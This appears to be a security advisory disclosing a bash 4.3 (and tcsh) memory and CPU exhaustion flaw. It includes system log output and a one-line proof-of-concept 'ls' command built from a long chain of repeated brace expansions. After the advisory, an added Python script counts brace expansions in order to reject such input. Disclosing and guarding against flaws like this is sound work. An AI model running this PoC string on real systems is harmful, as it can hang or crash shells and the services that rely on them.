Bash 4.3 uncontrolled resources exhaustion

2015.04.26
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: CWE-399

Bash 4.3 uncontrolled resources exhaustion ------------------------------------------------------------- Date: 26.04.2015 Credit: Maksymilian Arciemowicz from cxsecurity.com Issue type: CWE-399 Resource exhaustion ------------------------------------------------------------- ============================================================= Description: Memory and cpu exhaustion vulnerability has been defined in extracting specially crafted string before use in bash. ============================================================= Symptoms: Observed memory exhaustion in kernel_task and bash process under MacOSX 10.10.3 ------------------------------------------------------------- 0 kernel_task 236.0 04:17.95 170/10 0 2 9028M+ 0B 0B 0 0 running... 623 bash 15.6 02:08.22 1 0 15 3331M- 0B 31G+ 623 622 stuck... ------------------------------------------------------------- Under freebsd, ------------------------------------------------------------- Apr 26 12:25:43 kernel: swap_pager_getswapspace(16): failed Apr 26 12:25:43 kernel: pid 771 (bash), uid 1001, was killed: out of swap space ------------------------------------------------------------- and also exhaustion for tcsh ------------------------------------------------------------- Apr 26 12:22:35 kernel: swap_pager_getswapspace(16): failed Apr 26 12:22:35 last message repeated 3 times Apr 26 12:22:35 kernel: pid 749 (tcsh), uid 1001, was killed: out of swap space ------------------------------------------------------------- ============================================================= PoC: # ls 
.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250} ============================================================= Prevention: If resource exhaustion occur, kill parent process or restart services such as httpd etc ============================================================= Credit: Flaw disclosed by Maksymilian Arciemowicz from cxsecurity and cifrex Team. Follow our new bugtraq https://cxsecurity.com
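A defensive pre-check for the PoC pattern above, added here as an example and not part of the original advisory: in bash, `{1,250}` is a two-item brace list, so every repeated group doubles the number of words the shell has to build. The sketch computes that count without expanding anything, so untrusted input can be rejected before it reaches a shell. The function names and the limit are hypothetical; quoting, backslash escapes and letter ranges are not modelled.

```python
import re

# Numeric sequence form {a..b} or {a..b..step}; letter ranges are not modelled.
SEQ = re.compile(r"^(-?\d+)\.\.(-?\d+)(?:\.\.(-?\d+))?$")

def _close(s, start):
    """Index of the '}' matching s[start] == '{', or -1 if unbalanced."""
    depth = 0
    for j in range(start, len(s)):
        if s[j] == "{":
            depth += 1
        elif s[j] == "}":
            depth -= 1
            if depth == 0:
                return j
    return -1

def _alternatives(body):
    """Split a brace body at commas that are not inside nested braces."""
    parts, depth, cur = [], 0, ""
    for ch in body:
        depth += (ch == "{") - (ch == "}")
        if ch == "," and depth == 0:
            parts.append(cur)
            cur = ""
        else:
            cur += ch
    return parts + [cur]

def expansion_count(word):
    """Words produced by brace expansion of `word`, computed without expanding."""
    total, i = 1, 0
    while i < len(word):
        end = _close(word, i) if word[i] == "{" else -1
        if end != -1:
            body = word[i + 1:end]
            parts, seq = _alternatives(body), SEQ.match(body)
            if len(parts) > 1:            # {x,y,...}: alternatives add up
                total *= sum(expansion_count(p) for p in parts)
                i = end
            elif seq:                     # {a..b[..step]}
                a, b, step = (int(g or 1) for g in seq.groups())
                total *= abs(b - a) // (abs(step) or 1) + 1
                i = end
        i += 1                            # literal brace: keep scanning inside
    return total

def is_safe(word, limit=10_000):
    """Hypothetical guard: refuse input whose expansion exceeds `limit` words."""
    return expansion_count(word) <= limit
```

A constructed input of 40 repeats of the advisory's `.{1,250}` fragment already evaluates to 2**40 words, which is why the check has to happen before the string is handed to the shell.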


